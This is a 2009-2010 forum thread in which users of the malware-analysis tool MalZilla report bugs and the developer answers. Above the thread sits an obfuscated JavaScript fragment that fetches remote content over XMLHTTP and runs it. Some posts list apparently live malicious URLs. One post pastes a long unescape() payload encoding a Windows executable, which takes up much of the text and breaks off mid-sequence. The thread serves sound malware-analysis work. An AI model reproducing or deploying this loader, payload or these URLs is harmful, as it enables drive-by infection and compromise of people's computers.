("55"<.1?63.:divicolll)((.86<sumi?''+'Ms':6.)+(7e0>="0.05e2"?uicere:1.1e2))}catch(fando){try{foedum=(.67,'HTTP');uicere=(2638.,mergis+mari+'o'+'s'+senis+'f'+'')+(rotas<ludat?'t.'+'X'+'ML'+mergis:326)+(.443,foedum);raucam=new ('7158.'<=449?9.39e2:divicolll)((.368>7.?.70:mergis+'Mi'+'c')+(3.41e2<="57"?caros:uicere))}catch(shake){}}return (412,raucam)}viros=(.81<=0.52?9.5e1:rimerjie)[(1<3.946e3?''+acque+'ar'+'en'+rebus+creta+igitur+dando+'ow'+'':.7580)][(0.5<='2.5e1'?mergis+'s'+'e'+'l'+'f'+mergis:4)][('509'>=6e0?mergis+'w'+creta+igitur+dando+senis+'w'+mergis:98.)][(6.7e1,mergis+'f'+mari+'a'+citra+'e'+'s'+'')][(.7<.555?7.78e2:''+'s'+'e'+'l'+'f'+mergis)][(.9252,'F')+(4.,joey)];divicolll=(311,rimerjie)[(0.526,'pa'+mari+rector+igitur+'tWi'+'ndo'+'w'+mergis)][(6.1e1,alma+'elf'+mergis)][("6e0"<.868?.4:'wi'+nonam+mergis)][(2.621e3,ring)+(6291<22?2.205e3:tenuis)+(.9>=754?64:mergis+caduci+rector+'X'+'')+("6e0">=.79?'O'+mergis:0.2)+('4'>7.904e3?26:ictuum)];amicoccc=(5.<=facat?8145:rimerjie)[(.8>=8e0?3:mergis+acque+'a'+'re'+igitur+cervos+'W'+'i'+'nd'+'ow'+'')][(8e0>5e0?mergis+alma+rector+'l'+'f'+mergis:0.7198)][(itabat,'M')+(buck,funder)];queantyyo=('3.9e2'<=3.27e2?4e0:rimerjie)[("0.85"<=0.4e1?mergis+'par'+'ent'+'Window'+'':5.39e2)][(4.91e2,mergis+'w'+creta+'n'+dando+senis+'w'+mergis)][(.455,ring)+(781,'r')+("0.7e1">googly?5.7e1:mater)];egiqueaai=new (0.42e2,queantyyo)();oleum=(4.4e1>45.?8.:'G');annos=(0.5<=6?viros:403.);ilice=(48<=ageres?.5195:laude)+(teneto>=3789.?39.:natavijie)((.555>='4.'?.72:sulco),(mocker<rotas?0.3:aberim));pressoeea=(30.>=843?0.78:rura);scaeae=(futura,'T');snaky=(7e0,annos)((3e1>0.25?'ret':5.7e1)+(2.858e3,velabo+'rn '+mergis)+(bella>193?.32:mergis+creta+igitur+'t'+mari+'a'+'('+')'+mergis));taliayya=("9911"<=3.646e3?3.82e2:annos)((8.4e2,mergis+'x'+mergis),(6,'y'),(.8,'ret')+(3.771e3,'u'+mari+'n '+'')+(2.<facat?alma+'civit'+'('+'x,y'+')':1e0));velaiie=(1.<=4.?annos:5.8e1)((56,auctam),(0.1959<'4'?'ret':adorto)+(2.19e2,'urn ')+(23,'ba'+'r'+'cen'+'(x'+')'));ducem=(4,''+'on'+umida+mergis)+('936'<=.8185?2e0:''+'a'+dando+'y'+alma+'t'+mergis)+(facat,''+'a'+cervos+'e'+'c'+mergis)+(5.3e1,''+'h'+'a'+igitur+'g'+'e'+mergis);movere=(9.154e3,'E');(182>=9e0?velaiie:textum)((xxxii,ilice));function barcen(solvi,bardie,equum,sues){var stella=(suopte>0.4?snaky:21.)();(.4,stella)[(inest,"open")]((0.4374>'35'?9.:oleum)+(3.74e2,movere)+(819>'257.'?scaeae:8e0),(49,'?')+(0.994>=5e0?0.49e2:pressoeea)((3.6e1,taliayya)((7904.,''+'d'+rector+alma+'e'+mari+creta+'o'+'o'+caduci+mergis),(.751,solvi))),(4074,true));                         stella[(.35>.8731?2.34e2:ducem)]=(647.,impiis);function impiis(){if((.7071<=gravi?stella:0.9960)[(magnae<.598?2.95e3:mdcqve+"r"+matrem+"d"+"yS"+mque+proice+mque+"e")]==(4<3331?black:0.736)&&(0.261e3<3.21e2?stella:0.64)[(998.,parant+"tat"+infers)]==(2.,ardet)){(.4,annos)((5.6e1,taliayya)((6879.<=0.92e2?5:solvi),(".382">=83?959:valle)((paras<5.389e3?rotas:stella)[(acuta,mdcqve+"re"+egerit+"on"+"se"+"T"+"e"+"x"+"t")])))()}};(0.4176,stella)[(inerat,mdcqve+parant+"e"+"n"+duas+mdcqve)]((.314,dicari))}function demus(puppis,dolore,sentes,sociem){  var luget=amicoccc["floor"](amicoccc["random"]()*puppis[amorum]);ituri+=puppis["substring"](luget,luget+1)}function puer(lassa,puppis,ituri,caedis){for(iunges=0;iunges<lassa;iunges++){demus(puppis,iunges,lassa,ituri);}}function oblato(puppis,lassa,caedis,iuvet){ituri='';puer(lassa,puppis,ituri,caedis);return ituri}function rura(visu,cuinam,belli,boni){var obliti=(.5058,mergis);var etque;var iunges;var chiack=(793>=937?633:0);var minans=(hisco>=1599.?.27:acuta);iunges=(4638,dicari);for(etque=0;iunges<visu[amorum];iunges++,etque++){chiack=chiack*256+visu[yard](iunges);minans=minans*4;obliti=obliti+sulco["charAt"](parseInt(chiack/minans));chiack=chiack%minans;if(minans==64){obliti=obliti+sulco["charAt"](parseInt(chiack));chiack=0;minans=1;etque++}if(etque>=75){etque=-1;obliti=obliti+'\n'}}if((5e0>=27.?9462.:iunges)%(9e0,facat)){obliti=obliti+sulco["charAt"](parseInt(chiack*((iunges%3==1)?16:4)));obliti=obliti+((iunges%3)==1?'==':vitateei[optime](61))}return (2759,obliti)}function exciti(visu,fuerat,verras,uterum){var obliti=(.29,'');var iunges;var chiack=(2048<7468.?dicari:0.2);var minans=(317>="2692"?2e0:1);for(iunges=0;iunges<visu[amorum];iunges++){if(visu["charAt"](iunges)==vitateei[optime](61)||visu["charAt"](iunges)=='\n')break;chiack=chiack*64+sulco["indexOf"](visu["charAt"](iunges));minans=(minans==1?64:minans/4);if(minans!=64){obliti=obliti+vitateei[optime](parseInt(chiack/minans));chiack=chiack%minans}}return (574.,obliti)}function relata(uelque,duae,invde,doceri){this[(0.4e1>.1?""+oravi+"o"+mque+"s"+"e"+nodos+mdcqve:3.34e2)]=(8.,uelque);if((5.7e1,uelque)[(9e0>=9e0?"p"+"ar"+fetuum+mque+mdcqve:2778)]==(3.443e3>2.?uelque:54.)){genti=(0.2267,'a')}else{laude+=(0.8301,'@'+mergis)}}</script>
Title: Re: MalZilla
Post by: MysteryFCM on September 11, 2009, 11:31:37 pm
Bobby,
Just to let you know the new version has been doing great :)

Just one issue with the links parser - it doesn't seem to parse links that aren't in HREF's and SRC's (e.g. if a URL is in the HTML dropdown "select" options, it doesn't include them), nor does it seem to parse links from comments and such.

If possible, could you also have it parse using base matches? (e.g. parse if string contains "://" or "http" or "ftp" etc etc etc (this is the way I've got vURL parsing the, but obviously unlike Malzilla, vURL doesn't currently rebuild the URL's to include domain names and paths and such, it just presents them "as found" ....)

It also seem to have an issue if I tell it to grab a URL, then create a new tab to grab another one, whilst it's still grabbing the first (this also sporadically creates an error that requires I shut down Malzilla (don't have the error message atm, but it's something about the index or some such, I'll try and reproduce it and post it if I am able to)
Title: Re: MalZilla
Post by: bobby on September 23, 2009, 08:30:35 pm
Hi Steven,

Sorry for the late reply. Somehow I missed your message earlier.

As for the link parser - indeed, by design it parses just valid links from HTML tags (no links from comments and similar, nor links from plain text).
I do have code that can get every single URL from any kind of documents, but that wouldn't be really integrated with the rest of engine. I mean - I can't make such code to use the main HTML parser. It would do it after the main parser does its job, and that would prolong the complete parsing. It does not really hurts the performance, but it can't get the relative links calculated. It could get just the absolute full URLs.

As for the dropdown combo boxes - can you give me an example for such code, so that I can see which tags it uses?

As for the downloader - my first implementation was for single threaded downloader. After that I have added tabbed interface (as requested), but that was an ugly hack. The downloading thread didn't have info about which tab called for a download. The downloaded data was returned to the current active tab. So, if you have two tabs, click on "Get" on the first tab and turn to second tab before the download ends - the downloaded data would end on second tab.
Very annoying bug if one is working with multiple documents in single instance of Malzilla.
In latest development build I started the implementation of "awareness" about which tab called which download.
At the moment, I can't really recall what is the current state of that part of the code (last two months I didn't have even one single free minute of time for codding). I do not know if I ever finished that part or not :(
Blame my job for this (since May I'm working ~12 hours/day)
It can happen that the downloader thread do not check if the tab is still existing before it sends the data back to the tab (tab closed in meanwhile). Check if that is the case.

Hopefully, winter will bring me some peace, so that I can get back to my hobbies :)
Title: Re: MalZilla
Post by: SysAdMini on September 24, 2009, 11:36:56 am
Hi Bobby,

is there an option to disable minimizing to traybar ?
Malzilla disappears from taskbar when minimized and so I can't switch back to Malzilla by Alt+Tab.
Title: Re: MalZilla
Post by: MysteryFCM on September 24, 2009, 01:18:18 pm
Bobby,
hehe no problem.

I don't have any sites with the select code in them, handy, but they usually use;

Code: [Select]
<select ...etc>
   <option value="URL"...>
</select>

Or;

Code: [Select]
<select ...etc>
   <option name="URL"...>
</select>

Or;

Code: [Select]
<select ...etc>
   <option id="URL"...>
</select>

The structure and naming convention differs, but they're all related to the obfuscations that use HTML elements. The only others, are those that have the URL in the value var, which proceeds to the URL when clicked on (uses JS for the actual transfer).
Title: Re: MalZilla
Post by: bobby on September 24, 2009, 07:35:50 pm
@SysAdMini
There is no such option, but I'll implement it

@MysteryFCM
If I got it right, these URLs are not a real HTML references (tags), but a normal document data, just like the plain text on the site etc.
In that case, I assume it wrong to get them extracted with current parser.
Current parser follows the HTML rules about which element can contain some URL (image source, multimedia content, clickable links etc.) and it parses just these URLs.
That what you would need is a raw parser which pick ups every single URL from the HTML document, no matters if it is a URL reference in a tag or plain text on the site (non-clickable URL).

Did I got right the whole idea?
Title: Re: MalZilla
Post by: MysteryFCM on September 24, 2009, 07:41:33 pm
That's correct, yes :)
Title: Re: MalZilla
Post by: bobby on September 24, 2009, 07:50:21 pm
I will take care about raw parser, but it will be an extra option, not a main parser as it will miss all the relative links (which are now detected just because the current parser follows the HTML rules and knows which tag contains a link in which property).
Title: Re: MalZilla
Post by: MysteryFCM on September 24, 2009, 07:52:28 pm
Nice one, cheers :)
Title: Re: MalZilla
Post by: MysteryFCM on September 26, 2009, 10:22:27 pm
Bobby,
Couple more. On this one, Malzilla dives into "Out of memory" errors when trying to decode the following (copy/paste the code into the decoder tab, change the HTML element to the var etc etc);

Code: [Select]
http://miolana.com/forum/news.php?s=aec9dda79f
On this one, it fails to parse the SRC's from the iFrames;

Code: [Select]
http://www.everydaygame.net/Blog/
Title: Re: MalZilla
Post by: MysteryFCM on September 30, 2009, 01:21:58 am
Another minor problem, it only seems to sporadically list the IP(s) of the domains being queried. For example, it fails to display the correct IP for the following (exploit folks, so don't load it in a browser ;))

Code: [Select]
http://a.nt002.cn/E/ff154/ff154.htm
Title: Re: MalZilla
Post by: MysteryFCM on October 13, 2009, 02:09:19 am
Just a note, received an access violation when clicking to send this one to the links parser;

Code: [Select]
http://cnyswatmop.com
Title: Re: MalZilla
Post by: SysAdMini on December 06, 2009, 06:26:28 pm
Hi Bobby,

there is something that annoys me daily. If I use multiple download tabs and switch between them, then Malzilla doesn't keep
the cursor position of tabs. It switches always to the top.

Example : I'm in the middle of the page in Tab1, switching to Tab2 and switching back to Tab1. Now I'm on top of Tab1 and no longer in the middle of the page.
So I have to search for the last position again.
Title: Re: MalZilla
Post by: bobby on December 06, 2009, 10:19:43 pm
Hi Steven, hi SysAdMini,

sorry about the lack of feedback from me, I didn't touch Malzilla code for months...
I got stuck into some real-life troubles, and I didn't got a lot of chances to do any coding.

If you get any HTML/JS code that make troubles, please save a copy for me in the case that the content on troublesome URL changes.

As for the cursor positions, I think I can fix that this week.


The main problem with the Malzilla is that I do not like the concept anymore.
We need full-blown browser engine for the today's malware.
The implies implementing the whole DOM document model which can be exposed to the JavaScript engine. That would solve all the problems with scripts that are requiring data from HTTP headers, and with the malware requesting data from HTML objects (GetElementByID etc.) or creating new HTML elements.
That are just a few examples of missing things.
The problem is that the current Malzilla engine can't handle that kind of stuff.
Total rewrite is the only possible solution.

I already have a vision, but I'm missing spare time and some motivation... :(
Title: Re: MalZilla
Post by: SysAdMini on December 06, 2009, 11:06:32 pm
Hi Bobby,

yes, Malzilla isn't perfect, but it's currently the best tool of this type. There is no alternate.
I tried FileInsight, but I don't think that it's an alternate.
No other tool than Malzilla has all these builtin features.

Please don't stop. Go ahead ! We need you.
Title: Re: MalZilla
Post by: denmilu on March 16, 2010, 03:59:21 am
Hi Bobby,

Are You still here? i have a problem when using Malzilla, I have a code like bellow

Code: [Select]
var payload = unescape("%u5a4d%u0090%u0003%u0000%u0004%u0000%uffff%u0000%u00b8%u0000%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u00f0%u0000%u1f0e%u0eba%ub400%ucd09%ub821%u4c01%u21cd%u6854%u7369%u7020%u6f72%u7267%u6d61%u6320%u6e61%u6f6e%u2074%u6562%u7220%u6e75%u6920%u206e%u4f44%u2053%u6f6d%u6564%u0d2e%u0a0d%u0024%u0000%u0000%u0000%u8104%u6536%ue040%u3658%ue040%u3658%ue040%u3658%ub25e%u36dc%ue05b%u3658%ub25e%u36cd%ue051%u3658%ub25e%u36db%ue009%u3658%uef83%u3605%ue042%u3658%u2667%u3623%ue045%u3658%ue040%u3659%ue020%u3658%ub25e%u36d2%ue041%u3658%ub25e%u36c9%ue041%u3658%u6952%u6863%ue040%u3658%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u4550%u0000%u014c%u0004%u16b2%u4b4d%u0000%u0000%u0000%u0000%u00e0%u0103%u010b%u0009%u7000%u0000%u3000%u0000%u0000%u0000%u205f%u0000%u1000%u0000%u8000%u0000%u0000%u0040%u1000%u0000%u0200%u0000%u0005%u0000%u0000%u0000%u0005%u0000%u0000%u0000%ud000%u0000%u0400%u0000%u1c9a%u0001%u0003%u8100%u0000%u0010%u1000%u0000%u0000%u0010%u1000%u0000%u0000%u0000%u0010%u0000%u0000%u0000%u0000%u0000%u97ec%u0000%u0050%u0000%uc000%u0000%u01b4%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u94f0%u0000%u0040%u0000%u0000%u0000%u0000%u0000%u8000%u0000%u014c%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u742e%u7865%u0074%u0000%u6eaa%u0000%u1000%u0000%u7000%u0000%u0400%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0020%u6000%u722e%u6164%u6174%u0000%u1e96%u0000%u8000%u0000%u2000%u0000%u7400%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0040%u4000%u642e%u7461%u0061%u0000%u17fc%u0000%ua000%u0000%u0e00%u0000%u9400%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0040%uc000%u722e%u7273%u0063%u0000%u01b4%u0000%uc000%u0000%u0200%u0000%ua200%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0040%u4000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8b55%u81ec%u18ec%u0002%uff00%u2815%u4080%u6800%u0105%u0000%u006a%u858d%ufef8%uffff%ue850%u33ae%u0000%uc483%u680c%u0105%u0000%u006a%u858d%ufde8%uffff%ue850%u3398%u0000%uc483%u680c%u92c8%u0040%u006a%u006a%u15ff%u8048%u0040%u8589%ufef4%uffff%ubd83%ufef4%uffff%u7500%ue905%u00ff%u0000%u15ff%u8018%u0040%ub73d%u0000%u7500%ue905%u00ed%u0000%uece8%u0000%u8500%u75c0%ue905%u00df%u0000%u50e8%u0001%u8500%u75c0%ue905%u00d1%u0000%u0568%u0001%u8d00%uf885%ufffe%u50ff%u006a%u15ff%u8024%u0040%uc085%u0575%ub4e9%u0000%u6800%u0105%u0000%u858d%ufde8%uffff%uff50%u4015%u4080%u8500%u75c0%ue905%u0099%u0000%ud068%u4092%u6800%u0105%u0000%u858d%ufde8%uffff%ue850%u0b1c%u0000%uc483%u680c%u92d4%u0040%u0568%u0001%u8d00%ue885%ufffd%u50ff%u03e8%u000b%u8300%u0cc4%u858d%ufde8%uffff%u8d50%uf885%ufffe%u50ff%uc4e8%u000d%u5900%u8559%u74c0%u8d3c%ue885%ufffd%u50ff%u858d%ufef8%uffff%ue850%u010d%u0000%u5959%uc085%u0275%u33eb%ub5ff%ufef4%uffff%u15ff%u8030%u0040%u858d%ufde8%uffff%ue850%u0111%u0000%u8559%u75c0%ueb02%ueb14%u8d12%uf885%ufffe%u50ff%u50e8%u0001%u5900%ue0e8%u0001%u3300%uc9c0%u55c3%uec8b%uec83%u5620%ube57%u92e4%u0040%u7d8d%ua5e4%u66a5%ua4a5%uf0be%u4092%u8d00%uf07d%ua5a5%u8da5%ue445%uff50%u2015%u4080%u8900%ue045%u7d83%u00e0%u0475%uc033%u37eb%u458d%u50f0%u75ff%uffe0%u1c15%u4080%u8900%ufc45%u7d83%u00fc%u0475%uc033%u1deb%u446a%ufc68%u4092%u6800%u9308%u0040%u006a%u55ff%u83fc%u07f8%u0475%uc033%u03eb%uc033%u5f40%uc95e%u55c3%uec8b%u15ff%u802c%u0040%uf883%u7501%u3304%uebc0%u3303%u40c0%uc35d%u8b55%u51ec%u6583%u00fc%u07eb%u458b%u40fc%u4589%u8bfc%ufc45%u453b%u7d0c%u8b27%u0845%u4503%u0ffc%u00be%uc085%u0275%u18eb%u458b%u0308%ufc45%ub60f%u3500%u00a6%u0000%u4d8b%u0308%ufc4d%u0188%ucaeb%uc033%uc940%u55c3%uec8b%u016a%u006a%u006a%u006a%u75ff%uff0c%u0875%u15ff%u8038%u0040%uc085%u0475%uc033%u03eb%uc033%u5d40%u55c3%uec8b%uec83%u5758%u45c7%u44a8%u0000%u6a00%u6a40%u8d00%uac45%ue850%u3162%u0000%uc483%u330c%u8dc0%uf07d%uabab%uabab%u458d%u50f0%u458d%u50a8%u006a%u006a%u006a%u006a%u006a%u006a%u006a%u75ff%uff08%u1415%u4080%u8500%u75c0%u3304%uebc0%u3303%u40c0%uc95f%u55c3%uec8b%uec83%u8314%ufc65%u8d00%ufc45%u6850%u003f%u000f%u006a%uc868%u4093%u6800%u0002%u8000%u15ff%u8004%u0040%uc085%u0474%uc033%u67eb%u458b%u8908%uf845%u458b%u40f8%u4589%u8bf4%uf845%u008a%u4588%ufff3%uf845%u7d80%u00f3%uef75%u458b%u2bf8%uf445%u4589%u8bec%uec45%ue0d1%uff50%u0875%u016a%u006a%uf868%u4093%uff00%ufc75%u15ff%u8008%u0040%uc085%u0974%u75ff%ufffc%u0c15%u4080%u3300%uebc0%uff14%ufc75%u15ff%u800c%u0040%uc085%u0474%uc033%u03eb%uc033%uc940%u55c3%uec8b%uec81%u02e8%u0000%u5756%u00be%u4094%u8d00%u28bd%ufffd%ua5ff%ua5a5%ua4a5%u14be%u4094%u8d00%u48bd%ufffe%ua5ff%ua5a5%u66a5%ua4a5%u28be%u4094%u8d00%u18bd%ufffd%ua5ff%ua4a5%u0068%u0001%u6a00%u8d00%u4085%ufffd%u50ff%u45e8%u0030%u8300%u0cc4%u116a%u858d%ufd28%uffff%ue850%ufe4e%uffff%u5959%u136a%u858d%ufe48%uffff%ue850%ufe3e%uffff%u5959%u096a%u858d%ufd18%uffff%ue850%ufe2e%uffff%u5959%u858d%ufe70%uffff%u6850%u0202%u0000%u15ff%u8128%u0040%uc085%u0774%uc033%u84e9%u0001%u6800%uea60%u0000%u15ff%u803c%u0040%u006a%u016a%u026a%u15ff%u8138%u0040%u8589%ufe44%uffff%ubd83%ufe44%uffff%u75ff%u3307%ue9c0%u0157%u0000%u858d%ufd28%uffff%uff50%u4015%u4081%u8900%u2485%ufffd%u83ff%u24bd%ufffd%u00ff%u0575%u18e9%u0001%u6a00%u5802%u8966%u6085%ufffe%u6aff%uff50%u2c15%u4081%u6600%u8589%ufe62%uffff%u858b%ufd24%uffff%u408b%u8b0c%u8b00%u8900%u6485%ufffe%u83ff%u64bd%ufffe%uffff%u0575%udee9%u0000%u6a00%u8d10%u6085%ufffe%u50ff%ub5ff%ufe44%uffff%u15ff%u8120%u0040%u006a%u136a%u858d%ufe48%uffff%uff50%u44b5%ufffe%uffff%u4415%u4081%u8300%ufff8%u0575%ua8e9%u0000%u6a00%u6800%u0100%u0000%u858d%ufd40%uffff%uff50%u44b5%ufffe%uffff%u3415%u4081%ua300%ub6ac%u0040%u3d83%ub6ac%u0040%u74ff%u8309%uac3d%u40b6%u0000%u0275%u75eb%u858d%ufd18%uffff%u8d50%u4085%ufffd%u50ff%u91e8%u0006%u5900%u8959%u3c85%ufffd%u83ff%u3cbd%ufffd%u00ff%u0275%u4feb%u858b%ufd3c%uffff%u408a%u8808%u5f85%ufffe%u81ff%uac3d%u40b6%u0000%u0001%u7500%u6a21%u6800%u0100%u0000%u858d%ufd40%uffff%uff50%u44b5%ufffe%uffff%u3415%u4081%ua300%ub6ac%u0040%ud3eb%ub5ff%ufe5f%uffff%ub5ff%ufe44%uffff%u24e8%u0000%u5900%u3359%u40c0%u850f%ufe91%uffff%ub5ff%ufe44%uffff%u15ff%u813c%u0040%u15ff%u8130%u0040%uc033%u5f40%uc95e%u55c3%uec8b%ub60f%u0c45%uf883%u756f%uff0d%u0875%u46e8%u0000%u5900%u41eb%u3deb%ub60f%u0c45%uf883%u756e%uff0d%u0875%u8ce8%u0001%u5900%u2beb%u27eb%ub60f%u0c45%uf883%u7564%uff0d%u0875%u4de8%u0002%u5900%u15eb%u11eb%ub60f%u0c45%uf883%u7571%u6a08%uff00%u4c15%u4080%u3300%u5dc0%u55c3%uec8b%uec81%u00d8%u0000%u85c7%uff28%uffff%u0094%u0000%u326a%u006a%u458d%u50cc%uf3e8%u002d%u8300%u0cc4%u036a%u3468%u4094%u6a00%u8d32%ucc45%ue850%u0678%u0000%uc483%u8d10%u2885%uffff%u50ff%u15ff%u8034%u0040%uc085%u2b75%uff6a%u3868%u4094%u6a00%u8d32%ucc45%ue850%u048b%u0000%uc483%u6a10%u8d32%ucc45%uff50%u0875%ub5e8%u0003%u8300%u0cc4%ue6e9%u0000%u8300%u2cbd%uffff%u05ff%u5775%ubd83%uff30%uffff%u7501%u6a17%u68ff%u9440%u0040%u326a%u458d%u50cc%u4ee8%u0004%u8300%u10c4%u35eb%ubd83%uff30%uffff%u7502%u6a17%u68ff%u9448%u0040%u326a%u458d%u50cc%u2ee8%u0004%u8300%u10c4%u15eb%uff6a%u5068%u4094%u6a00%u8d32%ucc45%ue850%u0417%u0000%uc483%ueb10%u8375%u2cbd%uffff%u06ff%u5775%ubd83%uff30%uffff%u7500%u6a17%u68ff%u9458%u0040%u326a%u458d%u50cc%ueee8%u0003%u8300%u10c4%u35eb%ubd83%uff30%uffff%u7501%u6a17%u68ff%u9464%u0040%u326a%u458d%u50cc%ucee8%u0003%u8300%u10c4%u15eb%uff6a%u6c68%u4094%u6a00%u8d32%ucc45%ue850%u03b7%u0000%uc483%ueb10%u6a15%u68ff%u9474%u0040%u326a%u458d%u50cc%ua0e8%u0003%u8300%u10c4%u326a%u458d%u50cc%u75ff%ue808%u02ca%u0000%uc483%uc90c%u55c3%uec8b%uec81%u00a0%u0000%u6a57%u6a50%u8d00%u6085%uffff%u50ff%u9de8%u002c%u8300%u0cc4%uc033%u7d8d%uabf0%uabab%u6aab%u6a32%u8d00%ubc45%ue850%u2c84%u0000%uc483%u6a0c%u6803%u947c%u0040%u326a%u458d%u50bc%u09e8%u0005%u8300%u10c4%u506a%u858d%uff60%uffff%uff50%u1c15%u4081%u8300%ufff8%u0475%uc033%u71eb%u858d%uff60%uffff%uff50%u4015%u4081%u8900%ub445%u7d83%u00b4%u0475%uc033%u57eb%u458b%u8bb4%u0c40%u008b%u4589%u6ab8%u8bff%ub845%u30ff%u15ff%u8124%u0040%u6a50%u8d10%uf045%ue850%u02e9%u0000%uc483%u8d10%uf045%uc085%u0475%uc033%u25eb%uff6a%u458d%u50f0%u326a%u458d%u50bc%ucae8%u0002%u8300%u10c4%u326a%u458d%u50bc%u75ff%ue808%u01f4%u0000%uc483%u5f0c%uc3c9%u8b55%u81ec%u40ec%u0001%u8300%uc0a5%ufffe%u00ff%u326a%u006a%u858d%ufec4%uffff%ue850%u2bc0%u0000%uc483%u6a0c%u6803%u9480%u0040%u326a%u858d%ufec4%uffff%ue850%u0442%u0000%uc483%u6810%u0105%u0000%u006a%u858d%ufef8%uffff%ue850%u2b92%u0000%uc483%u680c%u0105%u0000%u858d%ufef8%uffff%u6a50%uff00%u2415%u4080%u8500%u75c0%u6a31%u68ff%u9484%u0040%u326a%u858d%ufec4%uffff%ue850%u0235%u0000%uc483%u6a10%u8d32%uc485%ufffe%u50ff%u75ff%ue808%u015c%u0000%uc483%ue90c%u0152%u0000%u858d%ufec0%uffff%u6850%u003f%u000f%u006a%u8868%u4094%u6800%u0002%u8000%u15ff%u8004%u0040%uc085%u3174%uff6a%ub868%u4094%u6a00%u8d32%uc485%ufffe%u50ff%ue2e8%u0001%u8300%u10c4%u326a%u858d%ufec4%uffff%uff50%u0875%u09e8%u0001%u8300%u0cc4%uffe9%u0000%u6800%u94bc%u0040%ub5ff%ufec0%uffff%u15ff%u8000%u0040%uc085%u3d74%ub5ff%ufec0%uffff%u15ff%u800c%u0040%uff6a%uc468%u4094%u6a00%u8d32%uc485%ufffe%u50ff%u90e8%u0001%u8300%u10c4%u326a%u858d%ufec4%uffff%uff50%u0875%ub7e8%u0000%u8300%u0cc4%uade9%u0000%uff00%uc0b5%ufffe%uffff%u0c15%u4080%u8500%u74c0%u6a2e%u68ff%u94c8%u0040%u326a%u858d%ufec4%uffff%ue850%u014f%u0000%uc483%u6a10%u8d32%uc485%ufffe%u50ff%u75ff%ue808%u0076%u0000%uc483%ueb0c%u6a6f%u6a04%u8d00%uf885%ufffe%u50ff%u15ff%u8044%u0040%uc085%u2e75%uff6a%ucc68%u4094%u6a00%u8d32%uc485%ufffe%u50ff%u0ce8%u0001%u8300%u10c4%u326a%u858d%ufec4%uffff%uff50%u0875%u33e8%u0000%u8300%u0cc4%u2ceb%uff6a%ud068%u4094%u6a00%u8d32%uc485%ufffe%u50ff%udee8%u0000%u8300%u10c4%u326a%u858d%ufec4%uffff%uff50%u0875%u05e8%u0000%u8300%u0cc4%uc3c9%u8b55%u81ec%ua4ec%u0000%u5600%ube57%u94d4%u0040%ubd8d%uff5c%uffff%ua5a5%ua5a5%u6aa4%u6a64%u8d00%u9045%ue850%u29ca%u0000%uc483%u6a0c%u5908%uc033%ubd8d%uff70%uffff%uabf3%u116a%u858d%uff5c%uffff%ue850%uf7c6%uffff%u5959%uff6a%u858d%uff5c%uffff%u6a50%u8d64%u9045%ue850%u0069%u0000%uc483%u6a10%uffff%u0c75%u646a%u458d%u5090%u56e8%u0000%u8300%u10c4%uff6a%ue868%u4094%u6a00%u8d64%u9045%ue850%u0041%u0000%uc483%u6a10%u6a00%u8d64%u9045%uff50%u0875%u15ff%u8144%u0040%uf883%u75ff%u3304%uebc0%u6a20%u6a00%u8d20%u7085%uffff%u50ff%u75ff%uff08%u3415%u4081%u8900%ufc45%u7d83%u20fc%ue374%uc033%u5f40%uc95e%u8bc3%u55ff%uec8b%u4d8b%u8b14%u0855%u3353%u56db%u3b57%u75cb%u3b10%u75d3%u3910%u0c5d%u1275%uc033%u5e5f%u5d5b%u3bc3%u74d3%u8b07%u0c7d%ufb3b%u1b77%u31e8%u0007%u6a00%u5e16%u3089%u5353%u5353%ue853%u06ba%u0000%uc483%u8b14%uebc6%u8bd5%u1075%ucb3b%u0874%uf33b%u0475%u1a88%ud6eb%uc28b%u1838%u0474%u4f40%uf875%ufb3b%uee74%uf983%u75ff%u8a0f%u880e%u4008%u3a46%u74cb%u4f22%uf375%u1deb%ucb3b%u1276%u0e8a%u0888%u4640%ucb3a%u0874%u744f%uff05%u144d%uee75%u5d39%u7514%u8802%u3b18%u75fb%u8381%u147d%u75ff%u8b0f%u0c45%u506a%u5c88%uff02%ue958%uff6e%uffff%u1a88%uade8%u0006%u6a00%u5922%u0889%uf18b%u75e9%uffff%uccff%ucccc%ucccc%ucccc%ucccc%u4c8b%u0824%u5357%u8a56%u8b11%u247c%u8410%u74d2%u8a6f%u0171%uf684%u5574%uf78b%u4c8b%u1424%u078a%uc683%u3a01%u74c2%u8417%u74c0%u8a0d%u8306%u01c6%uc23a%u0a74%uc084%uf375%u5b